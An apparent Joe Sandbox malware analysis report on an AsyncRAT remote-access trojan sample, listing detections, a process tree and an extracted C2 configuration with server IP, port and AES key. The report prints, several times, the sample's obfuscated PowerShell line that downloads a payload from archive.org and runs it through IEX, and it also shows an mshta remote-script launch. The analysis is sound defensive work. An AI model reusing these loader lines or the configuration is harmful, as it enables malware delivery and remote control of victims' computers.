Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report xGrfj8RvYg.exe

Overview

General Information

Sample Name:xGrfj8RvYg.exe
Analysis ID:433020
MD5:722603aa75534bec9d1191f062fb2c03
SHA1:321ea5aa8368f394dcbdcc6ce7ebaab89861150d
SHA256:3e7cecddd88f1fdc8eb055ef6ab1eacfadb706582cb0fe190d99e493baa78691
Tags:AsyncRATexeRAT
Infos:

Most interesting Screenshot:

Detection

AsyncRAT
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AsyncRAT
Creates an undocumented autostart registry key
Injects a PE file into a foreign processes
Obfuscated command line found
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Non Interactive PowerShell
Tries to load missing DLLs
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • xGrfj8RvYg.exe (PID: 4832 cmdline: 'C:\Users\user\Desktop\xGrfj8RvYg.exe' MD5: 722603AA75534BEC9D1191F062FB2C03)
    • mshta.exe (PID: 1276 cmdline: 'C:\Windows\System32\mshta.exe' https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
      • powershell.exe (PID: 3468 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X MD5: 95000560239032BC68B4C2FDFCDEF913)
        • conhost.exe (PID: 1564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 3680 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file C:\Users\Public\-----Run+++++++++.ps1 MD5: 95000560239032BC68B4C2FDFCDEF913)
          • aspnet_compiler.exe (PID: 6396 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
          • aspnet_compiler.exe (PID: 6800 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
  • cleanup

Malware Configuration

Threatname: AsyncRAT

{"Server": "216.230.75.62", "Ports": "1107", "Version": "0.5.7B", "Autorun": "false", "Install_Folder": "%AppData%", "Install_File": "windonws.exe", "AES_key": "SZyWY7zJ1VdyEsSSd7sfsCsuxNXhSZI0", "Mutex": "AsyncMutex_6SI8OkPnk", "AntiDetection": "false", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "3", "HWID": "null", "Certificate": "MIIE8jCCAtqgAwIBAgIQAMKnEVcvuQIQtAqxOy+oYTANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjEwNTE5MTM0ODQ1WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJvrsFgFjIMG1rYF1vehk3BhjSHAlQ5Noq7MIKWRa9CgdZHCTN/Gh9VwaWUYqMuzn6F4pGWgSAmwwuuouwlMe4g37Srpvawl5ocRkOnMC4MAsh08mucPg8f/kUN3DFtqO2yfgr3i83yX9keSdfqaCRcUoXh8Qhqa5F8Mlkd2yVOcsZvmTvaLsCtRZo9YOMZ/fnPBzu2NS+xv3qaqW723pMfbrFS04iokkSp5pRQhQRWPCNJ737a0ac9gBS/g1nAuElqEl62AgbprR6YAqsbsrSDo6kOEx7t071C7gbJaO4lu33Kchi/gIC3ftleFFQhqjWTIfxcOp/kuej5DIHH9QvyE12oi1qFc8dn+EVZ2yENyQcx4NOx73zUmFh20JIMW2x4qOfuT+MkkUstDEezdXOec8PzkGMhclDzMmhD3ZA1oIGnsupJHRTTPqMHHw8tx48rj09Xv4TQARpmMffPbW+GmunkNmKHqOsMN8oj2iVwbRK7mg+UJfUyQ+hhTz/AqeWaoRGjLJVSX/R6fs2uWXX6GD8ECOxEJfnm5hLQxwr0RRwOLqu+oVMvFqOZ3+4G1UD7QIIPESId0n6EdnDCLIGuk6PqXpqR7QQU+zvRmeK6VHOH/btjAYUNkEAM6gO0Z6hk6xDeCGxXnqtr3FWyk7V9FZoi4OSzqDPvyYf849Q1nAgMBAAGjMjAwMB0GA1UdDgQWBBR2rTenBO42ADwEdSVfGFG7Id35BjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQBkM4Am3dA31vOlVb3L4HKAuNkOPN+Iw4uslCNRYxtAc3xbiaqC8tXWcNvzNWfVdTOYjdEbo8g5+weIaD7D5vmoHzvkkyEm9+1EMMl8KcMo4I/jQmvObI74N31e43thfQb0OPP32xc3M2gRpxplMLyPGl9M22u8r5tQPo2JX/YpP5oa8gSZLo4LK2grkQLI45aGm1CWuqrpReCckH6UZOoR2EeDHf+VDcSrNQ0KJUG6tyEWWUg0FTs0hham+juKVb7Ai9ktQekAfJpAz0GGIXjd4YRwug5GabiJTbL5vW64E8q38Lz/rITER9f1Tho9r7bw9EKTGp1Q6MB9PSLHxOBeefDvpxIO6G+O8p+s7Gd5GEFDkF9z6UxVeJifhI4G2fwTz3IkbpzlZ2lBslkCy/iHGYSRDwOvhA+VDmzKXJHoW7BK1PgBQcZ2m+N8BNIHScqCanzHjQhoFMJL9f7r+/rqtJ/ranxVgK+66zGwMf6MW3u9PF93O3bln9A7Yr6dEhKReQDi0R9/qhJbqisz7Fmo8/6zn715MHHfz2pRPGlPFQKuqug8RfieY8maAZj11TUtQuOiToVFoRQHtbT1JjYQXTq++aXZA47BRKFnqmVIj+zLGHo/FkWbraZL+35yLAfwwlE/YopW+uYFcIHAHgDQhWmfD7MuiwYAY4YtNkgi5g==", "ServerSignature": "hb4rbDi2yorRia4zVii6fBe5zR5qZuT/oNzKkm5RCPxVI+DpAg6tP0HKmjqKbYbfXixb6DODIWmirNXfb6RavFFZFj5L1BSmGSCWmeVDM/IkG1v7H8053Uky0QHQ2bPzEIhio/2bZG7nxydLDiWz7jOA5hTZddxPN8Br/tFDBgOA2YvoFolDN/SyqFz61tucLLLKImugUQPB4sHE/xkAyXi1gtGQ/16xTSWjEKwIRYr/7rvSmfWpY/5oDiJvkWS/1MZAIQNLY1fyi9FRErVVeUnnTikLjZhOkouk7/QdJsJez78RuLjg+I5tTMBYhxG6q81sg7SrqotPY0sK3ZZAKaU4Vrmy1LKrBMpNQv3JiIWlI/lS56GB2bN/TA9sLcKAATEeWREuz8l/bJURfyZFk91OWqZ1mHwEXQGj5Wttm8jf+gG2TbMHgCPcpwFUFMqB7fSQIKv+pU1KOAvU64CUeLTzks4X5N8aHvduxLez78VMAyXSa2PWbv9znaxZZWCGScStHepOMiR4AXViv5F4HTb8v2nZ2x60Q0rMNmZ3T1yMA+WbdCeNBQDFD8roIU7iXGsheZ3Cfnd9MOYde+KESXBKyoZGdGoocdgu9NTzxVBAZ9fOUEXjXRfS6fh+dnAJc0GNGimVg/1EX6Q+xeKnpb2b73IU7G28wz78gQndt1Y=", "Group": "Default"}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Clean_lol123[1].txtwebshell_asp_obfuscatedASP webshell obfuscatedArnim Rupp
  • 0x55:$tagasp_long20: <script language="VB
  • 0xdc:$asp_payload11: WScript.Shell
  • 0xce:$asp_multi_payload_one1: CreateObject
  • 0xce:$asp_multi_payload_four1: CreateObject
  • 0xce:$asp_cr_write1: CreateObject(
  • 0x220:$m_multi_one1: Replace(
  • 0x282:$m_multi_one1: Replace(
  • 0x2af:$m_multi_one1: Replace(
  • 0x2fb:$m_multi_one1: Replace(

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000017.00000000.310047645.0000000000402000.00000040.00000001.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
    00000017.00000002.467029735.0000000000402000.00000040.00000001.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
      00000002.00000003.214415545.00000208942AB000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
      • 0x90a8:$s1: pOWeRsHeLL
      00000002.00000002.217899024.0000020893D10000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
      • 0x146:$s1: pOWeRsHeLL
      00000002.00000002.218422171.00000208942AD000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
      • 0x70a8:$s1: pOWeRsHeLL
      Click to see the 2 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      23.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
        23.0.aspnet_compiler.exe.400000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: MSHTA Spawning Windows ShellShow sources
          Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X , CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1276, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X , ProcessId: 3468
          Sigma detected: Suspicious PowerShell Command LineShow sources
          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X , CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1276, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X , ProcessId: 3468
          Sigma detected: Non Interactive PowerShellShow sources
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X , CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1276, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X , ProcessId: 3468

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000017.00000000.310047645.0000000000402000.00000040.00000001.sdmpMalware Configuration Extractor: AsyncRAT {"Server": "216.230.75.62", "Ports": "1107", "Version": "0.5.7B", "Autorun": "false", "Install_Folder": "%AppData%", "Install_File": "windonws.exe", "AES_key": "SZyWY7zJ1VdyEsSSd7sfsCsuxNXhSZI0", "Mutex": "AsyncMutex_6SI8OkPnk", "AntiDetection": "false", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "3", "HWID": "null", "Certificate": "MIIE8jCCAtqgAwIBAgIQAMKnEVcvuQIQtAqxOy+oYTANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjEwNTE5MTM0ODQ1WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJvrsFgFjIMG1rYF1vehk3BhjSHAlQ5Noq7MIKWRa9CgdZHCTN/Gh9VwaWUYqMuzn6F4pGWgSAmwwuuouwlMe4g37Srpvawl5ocRkOnMC4MAsh08mucPg8f/kUN3DFtqO2yfgr3i83yX9keSdfqaCRcUoXh8Qhqa5F8Mlkd2yVOcsZvmTvaLsCtRZo9YOMZ/fnPBzu2NS+xv3qaqW723pMfbrFS04iokkSp5pRQhQRWPCNJ737a0ac9gBS/g1nAuElqEl62AgbprR6YAqsbsrSDo6kOEx7t071C7gbJaO4lu33Kchi/gIC3ftleFFQhqjWTIfxcOp/kuej5DIHH9QvyE12oi1qFc8dn+EVZ2yENyQcx4NOx73zUmFh20JIMW2x4qOfuT+MkkUstDEezdXOec8PzkGMhclDzMmhD3ZA1oIGnsupJHRTTPqMHHw8tx48rj09Xv4TQARpmMffPbW+GmunkNmKHqOsMN8oj2iVwbRK7mg+UJfUyQ+hhTz/AqeWaoRGjLJVSX/R6fs2uWXX6GD8ECOxEJfnm5hLQxwr0RRwOLqu+oVMvFqOZ3+4G1UD7QIIPESId0n6EdnDCLIGuk6PqXpqR7QQU+zvRmeK6VHOH/btjAYUNkEAM6gO0Z6hk6xDeCGxXnqtr3FWyk7V9FZoi4OSzqDPvyYf849Q1nAgMBAAGjMjAwMB0GA1UdDgQWBBR2rTenBO42ADwEdSVfGFG7Id35BjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQBkM4Am3dA31vOlVb3L4HKAuNkOPN+Iw4uslCNRYxtAc3xbiaqC8tXWcNvzNWfVdTOYjdEbo8g5+weIaD7D5vmoHzvkkyEm9+1EMMl8KcMo4I/jQmvObI74N31e43thfQb0OPP32xc3M2gRpxplMLyPGl9M22u8r5tQPo2JX/YpP5oa8gSZLo4LK2grkQLI45aGm1CWuqrpReCckH6UZOoR2EeDHf+VDcSrNQ0KJUG6tyEWWUg0FTs0hham+juKVb7Ai9ktQekAfJpAz0GGIXjd4YRwug5GabiJTbL5vW64E8q38Lz/rITER9f1Tho9r7bw9EKTGp1Q6MB9PSLHxOBeefDvpxIO6G+O8p+s7Gd5GEFDkF9z6UxVeJifhI4G2fwTz3IkbpzlZ2lBslkCy/iHGYSRDwOvhA+VDmzKXJHoW7BK1PgBQcZ2m+N8BNIHScqCanzHjQhoFMJL9f7r+/rqtJ/ranxVgK+66zGwMf6MW3u9PF93O3bln9A7Yr6dEhKReQDi0R9/qhJbqisz7Fmo8/6zn715MHHfz2pRPGlPFQKuqug8RfieY8maAZj11TUtQuOiToVFoRQHtbT1JjYQXTq++aXZA47BRKFnqmVIj+zLGHo/FkWbraZL+35yLAfwwlE/YopW+uYFcIHAHgDQhWmfD7MuiwYAY4YtNkgi5g==", "ServerSignature": 